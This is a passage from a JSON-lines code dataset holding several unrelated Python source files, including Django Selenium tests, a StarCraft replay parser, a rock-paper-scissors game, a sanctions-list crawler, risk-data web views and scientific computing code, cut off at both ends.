, 1-1e-8))\n net.l3.alpha.data = probit(\n net.l3.lambdal) # 1/(1+torch.exp(-net.l3.lambdal.data))#(torch.clamp(self.l3.alpha.data,1e-8 , 1-1e-8))\n net.l1.gamma.alpha.data = probit(\n net.l1.lambdal) # 1/(1+torch.exp(-net.l1.lambdal.data))#(torch.clamp(self.l1.alpha.data,1e-8 , 1-1e-8))\n net.l2.gamma.alpha.data = probit(\n net.l2.lambdal) # 1/(1+torch.exp(-net.l2.lambdal.data))#(torch.clamp(self.l2.alpha.data,1e-8 , 1-1e-8))\n net.l3.gamma.alpha.data = probit(\n net.l3.lambdal) # 1/(1+torch.exp(-net.l3.lambdal.data))#(torch.clamp(self.l3.alpha.data,1e-8 , 1-1e-8))\n\n net.l1.gamma.exact = True\n net.l2.gamma.exact = True\n net.l3.gamma.exact = True\n\n res = test_ensemble(net)\n\n os = (torch.sum(net.l1.alpha.data > 0.5).cpu().detach().numpy() + torch.sum(\n net.l2.alpha.data > 0.5).cpu().detach().numpy() + torch.sum(net.l3.alpha.data > 0.5).cpu().detach().numpy()) / (\n 5 * 600 + 400 * 600 + 400 * 256)\n\n res = np.append(res, os)\n\n res = np.append(res, net.l1.alpha.cpu().detach().numpy().mean())\n res = np.append(res, net.l2.alpha.cpu().detach().numpy().mean())\n res = np.append(res, net.l3.alpha.cpu().detach().numpy().mean())\n\n np.savetxt(\"low_factor_gaussmaccuracies_\" + prefix + str(i) + \".csv\", res, delimiter=\",\")\n\n print(net.l1.alpha.cpu().detach().numpy().mean())\n print(net.l2.alpha.cpu().detach().numpy().mean())\n print(net.l3.alpha.cpu().detach().numpy().mean())\n\n plt.hist(net.l3.gamma.alpha.data.view(-1).cpu().detach().numpy(), bins=1000)\n plt.show()\n plt.hist(net.l1.alpha.view(-1).cpu().detach().numpy(), bins=1000)\n plt.show()\n plt.hist(net.l2.alpha.view(-1).cpu().detach().numpy(), bins=1000)\n plt.show()\n plt.hist(net.l3.alpha.view(-1).cpu().detach().numpy(), bins=1000)\n plt.show()\n\n\n torch.save(net.state_dict(), \"fgauusm\" + prefix + str(i) + \".par\")\n # pepochs = 1\n for epoch in range(pepochs):\n ptrain(net, optimizer, epoch, i)\n res = test_ensemble(net)\n np.savetxt(\"ptlow_factor_gaussmmaccuracies_\"+ prefix + str(i) + \".csv\", res, delimiter=\",\")\n torch.save(net.state_dict(), \"low_factor_gaussfmp\"+prefix+ str(i) + \".par\")","sub_path":"PHONEMNE/LBBNN-GP-LFMVN-PHONEMNE.py","file_name":"LBBNN-GP-LFMVN-PHONEMNE.py","file_ext":"py","file_size_in_byte":35158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"116731839","text":"import datetime\nfrom selenium import webdriver\n\nfrom django.test import LiveServerTestCase\nfrom django.contrib.auth.models import User\nfrom django.utils.dateformat import DateFormat\n\n\nclass AdminEntriesTest(LiveServerTestCase):\n\n\tdef setUp(self):\n\t\tself.admin_user = User.objects.create_superuser(\n\t\t\tusername='kyle',\n\t\t\tpassword='saqhouse',\n\t\t\temail='thefantasygeeks11@gmail.com'\n\t\t)\n\t\tself.today = DateFormat(datetime.date.today()).format('N d, Y')\n\n\t\tself.browser = webdriver.Firefox()\n\t\tself.browser.implicitly_wait(3)\n\n\tdef tearDown(self):\n\t\tself.browser.quit()\n\n\tdef test_admin_can_create_new_blog_entry(self):\n\t\t# Kyle decides to write a new blog post to help market The\n\t\t# Fantasy Geeks. He navigates to the admin interface\n\t\tself.browser.get('%s%s' % (self.live_server_url, '/admin/'))\n\n\t\t# He fills in his username and password when prompted and\n\t\t# clicks 'Log in' to continue to the admin interface\n\t\tusername_input = self.browser.find_element_by_id('id_username')\n\t\tusername_input.send_keys('kyle')\n\t\tpassword_input = self.browser.find_element_by_id('id_password')\n\t\tpassword_input.send_keys('saqhouse')\n\t\tlogin_button = self.browser.find_element_by_xpath(\n\t\t\t'//input[@value=\"Log in\"]'\n\t\t)\n\t\tlogin_button.click()\n\n\t\t# He then clicks on the '+Add' button next to the Entrys link\n\t\t# to go to the Add Entry page\n\t\tadd_entry_button = self.browser.find_element_by_xpath(\n\t\t\t'//a[@href=\"%s\"]' % '/admin/blog/entry/add/'\n\t\t)\n\t\tadd_entry_button.click()\n\n\t\t# Kyle fills in the Entry's title, content, and puts his own\n\t\t# name in as Author\n\t\ttitle_input = self.browser.find_element_by_id('id_title')\n\t\ttitle_input.send_keys('First Blog Post')\n\t\tauthor_field = self.browser.find_element_by_id('id_author')\n\t\tauthor_field.send_keys('Kyle Swartz')\n\t\tbody_input = self.browser.find_element_by_id('id_body')\n\t\tbody_input.send_keys('This is some blog content.')\n\n\t\t# He clicks the 'Save' button to save the Entry and is taken to\n\t\t# a new page that displays saved Entries\n\t\tsave_button = self.browser.find_element_by_name('_save')\n\t\tsave_button.click()\n\n\t\t# The title and publication date of each Entry is displayed\n\t\ttable = self.browser.find_element_by_id('result_list')\n\t\ttitles = table.find_elements_by_css_selector('th.field-title')\n\t\tpub_dates = table.find_elements_by_css_selector(\n\t\t\t'td.field-published_date'\n\t\t)\n\n\t\tself.assertIn('First Blog Post', [title.text for title in titles])\n\t\tself.assertIn(self.today, [date.text for date in pub_dates])\n\n\t\t# Kyle notices that the number of entiries is also displayed\n\t\tnum_entries = self.browser.find_element_by_css_selector('p.paginator')\n\t\tself.assertEqual('1 entry', num_entries.text)\n\n\t\t# Kyle decides to create another entry. He clicks the 'Add\n\t\t# entry +' button is taken back to the Add Entry page\n\t\tself.browser.find_element_by_link_text('Add entry').click()\n\n\t\t# He again enters the blog title and content and signs himself\n\t\t# as Author\n\t\ttitle_input = self.browser.find_element_by_id('id_title')\n\t\ttitle_input.send_keys('Second Blog Post')\n\t\tauthor_field = self.browser.find_element_by_id('id_author')\n\t\tauthor_field.send_keys('Kyle Swartz')\n\t\tbody_input = self.browser.find_element_by_id('id_body')\n\t\tbody_input.send_keys('This is some other blog content.')\n\n\t\t# He clicks the 'Save' button and again is taken back to the\n\t\t# Entries page. He is happy to see that both of his Blog\n\t\t# Entries now show up\n\t\tsave_button = self.browser.find_element_by_name('_save')\n\t\tsave_button.click()\n\n\t\ttable = self.browser.find_element_by_id('result_list')\n\t\ttitles = table.find_elements_by_css_selector('th.field-title')\n\t\tpub_dates = table.find_elements_by_css_selector(\n\t\t\t'td.field-published_date'\n\t\t)\n\n\t\tself.assertIn('First Blog Post', [title.text for title in titles])\n\t\tself.assertIn('Second Blog Post', [title.text for title in titles])\n\t\tself.assertIn(self.today, [date.text for date in pub_dates])\n\t\tself.assertIn(self.today, [date.text for date in pub_dates])\n\n\t\t# Kyle also sees that the number entries has also incremented\n\t\t# and the entries are conveniently sorted in reverse order of\n\t\t# publication\n\t\tnum_entries = self.browser.find_element_by_css_selector('p.paginator')\n\t\tself.assertEqual('2 entries', num_entries.text)\n\t\tself.assertEqual('Second Blog Post', titles[0].text)\n\n\nclass NewVisitorTest(LiveServerTestCase):\n\n\tdef setUp(self):\n\t\tself.browser = webdriver.Firefox()\n\t\tself.browser.implicitly_wait(3)\n\n\tdef tearDown(self):\n\t\tself.browser.quit()\n\n\tdef test_can_see_list_of_posts_and_go_to_full_post(self):\n\t\t# Joe hears about TheFantasyGeeks when Kyle posts a link to\n\t\t# the blog on reddit. He follows the link to the homepage.\n\t\tself.browser.get(self.live_server_url)\n\n\t\t# He notices the tab title displays the site name\n\t\tself.assertIn('The Fantasy Geeks', self.browser.title)\n\n\t\t# He also notices the site name and tag line are displayed\n\t\t# prominently on the page\n\t\theader_text = self.browser.find_element_by_tag_name('h1').text\n\t\tself.assertEqual(header_text, 'The Fantasy Geeks')\n\t\ttag_line = self.browser.find_element_by_tag_name('h2').text\n\t\tself.assertEqual(tag_line, 'Placeholder for Catchy Tagline')\n\n\t\t# Joe sees a list of recent blog posts on the page notices that\n\t\t# each post shows the title, author and publication date\n\n\t\t# Joe is happy to see he can read a preview of each post before\n\t\t# deciding which to read\n\n\t\t# Scrolling down the page he notices that the most recent posts\n\t\t# were at the top of the page\n\n\t\t# When he reaches the bottom of the page he sees that only the\n\t\t# 10 most recent posts are displayed, but he sees a button\n\t\t# inviting him to see older posts\n\n\t\t# Joes sees a post that intrigues him and clicks on the post\n\t\t# title. He is taken to the full Blog post page\n\t\tself.fail('Finish the test!')\n","sub_path":"functional_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"618204672","text":"import sc2reader\nimport json\nimport pprint\nimport math\nfrom datetime import timedelta\n\nreplay_dir = '' ## fill in your replay dir\nreplay_file = replay_dir + 'Ever Dream LE (101).SC2Replay'\n# replay_file = replay_dir + 'b-to-gm-on-time.SC2Replay'\n\nreplay = sc2reader.load_replay(replay_file)\npp = pprint.PrettyPrinter(indent=4)\n\nprint(replay.game_length)\nprint(replay.expansion)\n\nevents_to_exclude = [\n 'CameraEvent',\n 'TargetPointCommandEvent',\n 'SelectionEvent',\n 'GetControlGroupEvent',\n 'SetControlGroupEvent',\n 'TargetUnitCommandEvent'\n]\n\nevents_to_include = [\n 'UnitBornEvent',\n 'UnitDiedEvent',\n 'UnitInitEvent',\n 'UnitDoneEvent'\n]\n\ndummy_objects = [\n 'Beacon',\n 'MineralField',\n 'PurifierMineralField',\n 'VespeneGeyser',\n 'RichVespeneGeyser',\n 'DestructibleRock',\n 'ShakurasVespeneGeyser',\n 'UnbuildableBricksDestructible',\n 'ProtossVespeneGeyser',\n 'KarakMale',\n 'UnbuildablePlatesDestructible',\n 'XelNagaTower',\n 'KarakFemale'\n]\n\ndef shouldFilter(event):\n type_name = event.get('unit_type_name', None)\n if (type_name != None):\n for dummy in dummy_objects:\n if (type_name.startswith(dummy)):\n return True\n return False\n\nunits_by_user = dict()\nunits_that_died = set()\nunits_building = set()\ngame_time = []\nlast_printed = []\n\ndef pretty_game_time():\n total_seconds = game_time[0]\n delta = timedelta(seconds = total_seconds)\n return str(delta)\n\ndef print_current_state():\n print('')\n print(pretty_game_time())\n for user in units_by_user.keys():\n units = units_by_user[user]\n units_by_type = dict()\n for unit in units:\n if unit not in units_that_died:\n unit_type = unit.split('[')[0]\n if unit_type not in units_by_type:\n units_by_type[unit_type] = 0\n units_by_type[unit_type] = units_by_type[unit_type] + 1\n print(user)\n print(units_by_type)\n\ndef compute_units():\n count = 0\n for event in replay.events:\n event_info = event.__dict__\n if (event_info['name'] in events_to_exclude):\n continue\n if (event_info['name'] in events_to_include):\n if (not shouldFilter(event_info)):\n # 1.4 appears to be a magic number from \"faster\" game speed\n current_time = math.floor(event_info['second'] / 1.4)\n\n game_time.clear()\n game_time.append(current_time)\n # pp.pprint(event_info)\n\n print(pretty_game_time() + \" \" + event_info['name'] + \" \" + str(event_info['unit']))\n\n if (event_info['name'] == 'UnitDiedEvent'):\n units_that_died.add(str(event_info['unit']))\n if (event_info['name'] == 'UnitDoneEvent'):\n units_building.remove(str(event_info['unit']))\n\n user = event_info.get('unit_controller', None)\n if (user is None):\n continue\n if user not in units_by_user.keys():\n units_by_user[user] = set()\n if (event_info['name'] == 'UnitBornEvent'):\n units_by_user[user].add(str(event_info['unit']))\n if (event_info['name'] == 'UnitInitEvent'):\n units_by_user[user].add(str(event_info['unit']))\n units_building.add(str(event_info['unit']))\n count = count + 1\n\n if (len(last_printed) == 0):\n print_current_state()\n last_printed.append(current_time)\n else:\n last_time = last_printed[0]\n if (current_time - last_time >= 20):\n print_current_state()\n last_printed.clear()\n last_printed.append(current_time)\n\n# for event in replay.events:\n# event_info = event.__dict__\n# if ('Spawning' in pp.pformat(event_info)):\n# pp.pprint(event_info)\n\ncompute_units()","sub_path":"replays.py","file_name":"replays.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"170300448","text":"#import random or\nfrom random import randint\nplayer_score = 0\ncomputer_score = 0\nwinning_score = 3\n\nwhile player_score < winning_score and computer_score < winning_score :\n\tprint(f\"Player score {player_score} Computer score {computer_score}\")\n\tprint(\"....rock....\")\n\tprint(\"....paper....\")\n\tprint(\"....scissors....\")\n\n\tplayer = input(\"Player, enter your choice :\").lower()\n\n\tran_num = randint(0,2)\n\tif ran_num == 0:\n\t\tcomputer = \"rock\"\n\telif ran_num == 1:\n\t\tcomputer = \"paper\"\n\telse :\n\t\tcomputer = \"scissors\"\n\tprint(f\"Computer plays {computer}\")\n\n\tif player == computer :\n\t\tprint(\"Its a Tie!!\")\n\n\telif player == \"rock\": \n\t\tif computer ==\"paper\":\n\t\t\tprint(\"Computer wins\")\n\t\t\tcomputer_score +=1\n\t\telif computer ==\"scissors\":\n\t\t\tprint(\"Player one wins\")\n\t\t\tplayer_score += 1\n\n\telif player == \"paper\": \n\t\tif computer ==\"rock\":\n\t\t\tprint(\"Player one wins\")\n\t\t\tplayer_score += 1\n\t\telif computer ==\"scissors\":\n\t\t\tprint(\"Computer wins\")\n\t\t\tcomputer_score +=1\n\n\telif player == \"scissors\":\n\t\tif computer ==\"paper\":\n\t\t\tprint(\"Player one wins\")\n\t\t\tplayer_score += 1\n\t\telif computer ==\"rock\":\n\t\t\tprint(\"Computer wins\")\n\t\t\tcomputer_score +=1\n\n\telse:\n\t\tprint(\"Invalid Choice\")\n\nif player_score > computer_score:\n\tprint(\"Player wins, yeepiee!!\")\nelif player_score == computer_score:\n\tprint(\"Its a Tie\")\nelse:\n\tprint(\"Oh no, Computer won the war!!\")\n","sub_path":"4_Games/rps_v2.py","file_name":"rps_v2.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"391382327","text":"from collections import defaultdict\nfrom pprint import pprint # noqa\n\nfrom normality import stringify\nfrom memorious.helpers import parse_date\nimport csv\n\nfrom opensanctions.models import Entity, Identifier\n\n\nENTITY_TYPES = {\n 'Individual': Entity.TYPE_INDIVIDUAL,\n 'Entity': Entity.TYPE_ENTITY,\n}\n\n\ndef fresh_value(seen, row, key):\n value = row.get(key)\n if value is None:\n return False\n if key not in seen or value in seen[key]:\n seen[key].add(value)\n return True\n return False\n\n\ndef parse_entry(context, data):\n group = data.get('group')\n rows = data.get('rows')\n seen = defaultdict(set)\n entity = Entity.create('gb-hmt-sanctions', group)\n for row in rows:\n entity.type = ENTITY_TYPES[row.pop('Group Type')]\n names = (row.pop('Name 1'), row.pop('Name 2'), row.pop('Name 3'),\n row.pop('Name 4'), row.pop('Name 5'), row.pop('Name 6'))\n names = [n for n in names if len(n) > 0]\n row['_name'] = ' '.join(names)\n\n if fresh_value(seen, row, '_name'):\n name = entity\n if entity.name is not None:\n name = entity.create_alias()\n name.type = row.get('Alias Type')\n name.title = row.get('Title')\n name.last_name = names.pop()\n if len(names):\n name.first_name = names.pop(0)\n if len(names):\n name.second_name = names.pop(0)\n if len(names):\n name.third_name = ' '.join(names)\n\n if row.get('Regime'):\n entity.program = row.pop('Regime')\n if row.get('Position'):\n entity.function = row.pop('Position')\n if row.get('Other Information'):\n entity.summary = row.pop('Other Information')\n if row.get('Last Updated'):\n entity.updated_at = row.pop('Last Updated')\n\n if fresh_value(seen, row, 'DOB'):\n dob_text = row.get('DOB')\n if dob_text is None or not len(dob_text.strip()):\n continue\n dob = parse_date(dob_text)\n if dob is None and '/' in dob_text:\n _, dob = dob_text.rsplit('/', 1)\n birth_date = entity.create_birth_date()\n birth_date.date = stringify(dob)\n\n if fresh_value(seen, row, 'Town of Birth') or \\\n fresh_value(seen, row, 'Country of Birth'):\n birth_place = entity.create_birth_place()\n birth_place.place = row.pop('Town of Birth')\n birth_place.country = row.pop('Country of Birth')\n\n addr = [row.pop('Address 1'), row.pop('Address 2'),\n row.pop('Address 3'), row.pop('Address 4'),\n row.pop('Address 5'), row.pop('Address 6')]\n addr_ids = addr + [row.get('Post/Zip Code'), row.get('Post/Zip Code')]\n row['_addr'] = ' '.join([a for a in addr_ids if len(a) > 0])\n if fresh_value(seen, row, '_addr'):\n address = entity.create_address()\n address.country = row.pop('Country')\n address.postal_code = row.pop('Post/Zip Code')\n address.text = ', '.join([a for a in addr if len(a) > 0])\n\n if fresh_value(seen, row, 'Passport Details'):\n identifier = entity.create_identifier()\n identifier.type = Identifier.TYPE_PASSPORT\n identifier.number = row.pop('Passport Details')\n identifier.country = row.get('Nationality')\n\n if fresh_value(seen, row, 'NI Number'):\n identifier = entity.create_identifier()\n identifier.type = Identifier.TYPE_NATIONALID\n identifier.number = row.pop('NI Number')\n identifier.country = row.get('Nationality')\n\n if fresh_value(seen, row, 'Nationality'):\n has_match = False\n text = row.pop('Nationality')\n for name in text.split(')'):\n code = name\n if code is not None:\n nationality = entity.create_nationality()\n nationality.country = name\n has_match = True\n if not has_match:\n nationality = entity.create_nationality()\n nationality.country = text\n # pprint(entity.to_dict())\n context.emit(data=entity.to_dict())\n\n\ndef parse(context, data):\n groups = {}\n res = context.http.rehash(data)\n\n with open(res.file_path, 'r', encoding='iso-8859-1') as csvfile:\n # ignore first line\n next(csvfile)\n for row in csv.DictReader(csvfile):\n group = int(float(row.pop('Group ID')))\n if group not in groups:\n groups[group] = []\n groups[group].append({k: stringify(v) if stringify(v) is not None else '' for k, v in row.items()})\n\n for group, rows in groups.items():\n context.emit(data={\n 'group': group,\n 'rows': rows\n })\n","sub_path":"opensanctions/crawlers/gb_hmt_sanctions.py","file_name":"gb_hmt_sanctions.py","file_ext":"py","file_size_in_byte":4892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"37008590","text":"from django.conf import settings\nfrom django import forms\nfrom django.db.models import Q\nfrom django.views.generic import FormView\nfrom django.http import HttpResponse, FileResponse\nfrom geonode.layers.models import Layer\nfrom risks.models import (RiskApp, FurtherResource, HazardType, AnalysisType, \n RiskAnalysis, DymensionInfo, Region, AdministrativeDivision,\n RiskAnalysisDymensionInfoAssociation)\nfrom risks.datasource import GeoserverDataSource\n\n\nclass AppAware(object):\n DEFAULT_APP = RiskApp.APP_DATA_EXTRACTION\n\n def get_app_name(self):\n return self.kwargs['app']\n\n def get_app(self):\n app_name = self.get_app_name()\n return RiskApp.objects.get(name=app_name)\n\n\nclass ContextAware(AppAware):\n\n CONTEXT_KEYS = ['ht', 'at', 'an', 'dym']\n\n def get_context_url(self, **kwargs):\n out = []\n if kwargs.pop('_full', None):\n ctx_keys = ['app', 'loc' ] + self.CONTEXT_KEYS\n else:\n ctx_keys = self.CONTEXT_KEYS\n for k in ctx_keys:\n if kwargs.get(k):\n out.extend([k, kwargs[k]])\n else:\n break\n if out:\n url = '{}/'.format('/'.join(out))\n else:\n url = None\n return url\n\n def fr_for_an(self, an, **kwargs):\n \"\"\"\n .. py:method: ft_for_an(an, **kwargs)\n\n :param an: Risk Analysis object\n :param dict kwargs: other parameters available\n :type an: :py:class: rdh.risks.models.RiskAnalysis\n\n Returns list of :py:class: rdh.risks.models.FurtherResource\n related to Hazard type (assigned to Risk Analysis). Region may be used to narrow results.\n\n \"\"\"\n if an.hazardset is None:\n return []\n region = None\n #if kwargs.get('loc'):\n #region = kwargs['loc'].region\n if kwargs.get('reg'):\n region = kwargs['reg']\n\n return FurtherResource.for_hazard_set(an.hazardset, region=region)\n\n\n def fr_for_dym(self, dym, **kwargs):\n \"\"\"\n .. py:method: fr_for_dym(dym, **kwargs)\n\n :param dym: DymensionInfo object\n :param dict kwargs: other parameters for query\n :type dym: :py:class: rdh.risks.models.DymensionInfo\n\n Returns list of :py:class: rdh.risks.models.FurtherResource\n related to DymensionInfo. Region and Risk Analysis may be used to\n narrow results.\n \"\"\"\n\n\n if dym is None:\n return []\n ranalysis = kwargs.get('an')\n region = None\n #if kwargs.get('loc'):\n #region = kwargs['loc'].region\n if kwargs.get('reg'):\n region = kwargs['reg']\n return FurtherResource.for_dymension_info(dym, region=region, ranalysis=ranalysis)\n\n\n def fr_for_at(self, at, **kwargs):\n \"\"\"\n .. py:method: fr_for_at(dym, **kwargs)\n\n :param at: AnalysisType object\n :param dict kwargs: other parameters for query\n :type dym: :py:class: rdh.risks.models.DymensionInfo\n\n Returns list of :py:class: rdh.risks.models.FurtherResource\n related to DymensionInfo. Region and Risk Analysis may be used to\n narrow results.\n \"\"\"\n if at is None:\n return []\n htype = kwargs.get('ht')\n region = None\n #if kwargs.get('loc'):\n #region = kwargs['loc'].region\n if kwargs.get('reg'):\n region = kwargs['reg']\n return FurtherResource.for_analysis_type(at, region=region, htype=htype)\n\n\n # maps url captured argument to specific class and field for lookup\n CONTEXT_KEYS_CLASSES = (('ht', HazardType, 'mnemonic'),\n ('at', AnalysisType, 'name',),\n ('an', RiskAnalysis, 'id',),\n ('dym', DymensionInfo, 'id',),\n ('reg', Region, 'name',),\n ('loc', AdministrativeDivision, 'code',)\n )\n\n\n def get_further_resources_inputs(self, **kwargs):\n \"\"\"\n .. py:method:: get_further_resources_inputs(self, **kwargs)\n\n :param dict kwargs: keyword arguments obtained from url parser\n :return: dictionary with objects for keyword and criteria\n\n This will check each pair of (key, value) from url kwargs and,\n using map between key and class, will get specific object identified\n by value.\n\n \"\"\"\n\n out = {}\n for k, klass, field in self.CONTEXT_KEYS_CLASSES:\n if not kwargs.get(k):\n continue\n related = self._get_from_kwargs(klass, field, kwargs[k])\n out[k] = related\n return out\n\n def get_further_resources(self, **kwargs):\n \"\"\"\n .. py:method:: get_further_resources(self, **kwargs)\n\n returns map of criteria and further resources available for given criteria\n\n :param dict kwargs: keyword arguments obtained from url parser (see CONTEXT_KEY_CLASSES)\n :return: dictionary with object type name and list of related resources\n :rtype: dict\n\n \"\"\"\n inputs = kwargs.pop('inputs', None) or self.get_further_resources_inputs(**kwargs)\n out = {}\n for res_type, key_name in (('at', 'analysisType',),\n ('dym', 'hazardSet',),\n ('an', 'hazardType',)):\n res_type_handler = getattr(self, 'fr_for_{}'.format(res_type))\n if kwargs.get(res_type):\n res_list = res_type_handler(**inputs)\n out[key_name] = self._fr_serialize(res_list)\n return out\n\n\n def _fr_serialize(self, items):\n return [i.export() for i in items]\n\n def _get_from_kwargs(self, klass, field, field_val):\n app = self.get_app()\n kwargs = {field: field_val}\n if hasattr(klass, 'app'):\n kwargs['app'] = app\n return klass.objects.get(**kwargs)\n\n\nclass FeaturesSource(object):\n\n AXIS_X = 'x'\n AXIS_Y = 'y'\n KWARGS_MAPPING = {'loc': 'adm_code',\n 'ht': 'hazard_type',\n 'an': 'risk_analysis',\n 'evt': 'event_id'}\n\n def url_kwargs_to_query_params(self, **kwargs):\n out = {}\n for k, v in kwargs.iteritems():\n if self.KWARGS_MAPPING.get(k):\n new_k = self.KWARGS_MAPPING[k]\n out[new_k] = v\n return out\n\n def get_dim_association(self, analysis, dyminfo):\n ass_list = RiskAnalysisDymensionInfoAssociation.objects.filter(riskanalysis=analysis, dymensioninfo=dyminfo)\n dim_list = set([a.axis_to_dim() for a in ass_list])\n if len(dim_list) != 1:\n raise ValueError(\"Cannot query more than one dimension at the moment, got {}\".format(len(dim_list)))\n\n return (ass_list.first(), list(dim_list)[0])\n\n def get_dymlist_field_mapping(self, analysis, dimension, dymlist):\n out = []\n layers = [analysis.layer.typename]\n current_dim_name = self.get_dim_association(analysis, dimension)[1]\n out.append(current_dim_name)\n for dym in dymlist:\n if dym != dimension:\n dim_association = self.get_dim_association(analysis, dym)\n out.append(dim_association[1])\n return (out, layers)\n\n def get_features(self, analysis, dimension, dymlist, **kwargs):\n\n (dymlist_to_fields, dym_layers) = self.get_dymlist_field_mapping(analysis, dimension, dymlist)\n\n s = settings.OGC_SERVER['default']\n gs = GeoserverDataSource('{}/wfs'.format(s['LOCATION'].strip(\"/\")),\n username=s['USER'],\n password=s['PASSWORD']\n ) \n dim_name = dymlist_to_fields[0] \n layer_name = dym_layers[0] \n #if 'additional_data' in kwargs:\n # layer_name = '{}_{}'.format(layer_name, kwargs['additional_data'])\n #features = gs.get_features(layer_name, dim_name, **kwargs)\n features = gs.get_features(layer_name, None, **kwargs)\n return features\n\n def get_features_base(self, layerName, field_list, **kwargs):\n s = settings.OGC_SERVER['default']\n gs = GeoserverDataSource('{}/wfs'.format(s['LOCATION'].strip(\"/\")),\n username=s['USER'],\n password=s['PASSWORD']\n )\n features = gs.get_features(layerName, field_list, **kwargs)\n return features\n\n\nclass LocationSource(object):\n\n DEFAULT_LIMIT_RESULTS = 8\n \n def get_region(self, **kwargs):\n try:\n return Region.objects.get(name=kwargs['reg']) \n except Region.DoesNotExist:\n return\n\n def get_location_exact(self, loc):\n try:\n return AdministrativeDivision.objects.get(code=loc) \n except AdministrativeDivision.DoesNotExist:\n return None\n \n def get_location(self, **kwargs):\n loc = self.get_location_exact(kwargs['loc'])\n if loc: \n locations = loc.get_parents_chain() + [loc]\n return locations \n return None\n\n def get_location_range(self, loc):\n return AdministrativeDivision.objects.filter(code__in=loc) \n \n def location_lookup(self, **kwargs):\n #matches = AdministrativeDivision.objects.filter(name__icontains=kwargs['admlookup'])\n qstring = kwargs['admlookup']\n matches = AdministrativeDivision.objects.filter(\n Q(name=qstring) | Q(name__istartswith=qstring)\n ).extra(\n select={'match': 'name = %s'},\n select_params=(qstring,)\n ).order_by('-match', 'name')\n loc_chains = []\n if matches: \n limit = int(kwargs['limit']) if 'limit' in kwargs else self.DEFAULT_LIMIT_RESULTS\n for loc in matches[:limit]:\n loc_chains.append(loc.get_parents_chain() + [loc])\n return loc_chains\n\n\nclass LayersListForm(forms.Form):\n layers = forms.MultipleChoiceField(required=False, choices=())\n\n def get_layers(self):\n if not self.is_valid():\n return []\n d = self.cleaned_data\n return Layer.objects.filter(id__in=d['layers'])\n\n\nclass RiskLayersView(FormView):\n form_class = LayersListForm\n\n def get_risk(self):\n rid = self.kwargs['risk_id']\n try:\n return RiskAnalysis.objects.get(id=rid)\n except RiskAnalysis.DoesNotExist:\n pass\n\n def get_layer_choices(self):\n r = self.get_risk()\n if r.layer is None:\n q = Layer.objects.all().values_list('id', flat=True)\n else:\n q = Layer.objects.exclude(id=r.layer.id).values_list('id', flat=True)\n return [(str(val), str(val),) for val in q]\n\n def get_form(self, form_class=None):\n f = super(RiskLayersView, self).get_form(form_class)\n choices = self.get_layer_choices()\n f.fields['layers'].choices = choices\n return f\n\n\n def form_invalid(self, form):\n err = form.errors\n return json_response({'errors': err}, status=400)\n\n def form_valid(self, form):\n rid = self.kwargs['risk_id']\n risk = self.get_risk()\n if risk is None:\n return json_response({'errors': ['Invalid risk id']}, status=404)\n\n data = form.cleaned_data\n\n risk.additional_layers.clear()\n layers = form.get_layers()\n risk.additional_layers.add(*layers)\n risk.save()\n return self.get()\n\n\n def get(self, *args, **kwargs):\n rid = self.kwargs['risk_id']\n risk = self.get_risk()\n if risk is None:\n return json_response({'errors': ['Invalid risk id']}, status=404)\n out = {}\n out['success'] = True\n out['data'] = {'layers': list(risk.additional_layers.all().values_list('typename', flat=True))}\n return json_response(out)\n\n\nclass CleaningFileResponse(FileResponse):\n def __init__(self, *args, **kwargs):\n\n on_close = kwargs.pop('on_close', None)\n super(CleaningFileResponse, self).__init__(*args, **kwargs)\n self._on_close = on_close\n\n def close(self):\n print('closing', self)\n if callable(self._on_close):\n self._on_close()\n super(CleaningFileResponse, self).close()","sub_path":"risks/views/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":12472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"72752691","text":"\"\"\"\nGiven an array, the task is to find maximum triplet sum in the array.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Then T test cases follow. Each test case consists of two lines. First line of each test case contains an Integer N denoting size of array and the second line contains N space separated elements.\n\nOutput:\nFor each test case, print the maximum triplet sum in new line.\n\nConstraints:\n1<=T<=100\n3<=N<=106\n-105<=A[i]<=105\n\nExample:\nInput:\n2\n6\n1 0 8 6 4 2\n7\n1 2 3 0 -1 8 10\nOutput:\n18\n21\n\"\"\"\n\n\ndef maximum_triplet_sum_in_array(arr, size):\n arr = sorted(arr)\n return sum(arr[size - 3:size])\n\n\nif __name__ == '__main__':\n t = int(input())\n for i in range(t):\n size = int(input())\n arr = [int(i) for i in input().split()][0:size]\n print(maximum_triplet_sum_in_array(arr, size))\n","sub_path":"practice/Basic/maximum_triplet_sum_in_array.py","file_name":"maximum_triplet_sum_in_array.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"42691252","text":"import jax\nimport jax.numpy as np\nimport itertools as it\nimport numpy as onp\nfrom jax.config import config; config.update(\"jax_enable_x64\", True)\nnp.set_printoptions(linewidth=200)\n\ndef tei_setup(geom,basis):\n nbf = basis.shape[0]\n nbf_per_atom = int(nbf / 2)\n G = np.ones((nbf,nbf,nbf,nbf))\n #TODO\n # NotImplementedError: np.repeat implementation only supports scalar repeats\n #centers = np.repeat(geom, 32, axis=0) # TODO currently can only repeat each center the same number of times => only works for when all atoms have same # of basis functions\n centers = np.repeat(geom, nbf_per_atom, axis=0) # TODO currently can only repeat each center the same number of times => only works for when all atoms have same # of basis functions\n norm = (2 * basis / np.pi)**(3/4)\n G *= np.einsum('i,j,k,l',norm,norm,norm,norm)\n G *= (2 * np.pi**2)\n # Obtain miscellaneous terms \n # (i,l,j,k) + (l,i,j,k) ---> (i+l,i+l,j+j,k+k) ---> (A+D,D+A,C+C,B+B) which is just (A+D,A+D,C+C,B+B)\n tmp1 = np.broadcast_to(basis, (nbf,nbf,nbf,nbf))\n aa_plus_bb = tmp1.transpose((0,3,1,2)) + tmp1.transpose((3,0,1,2))\n G *= (1 / 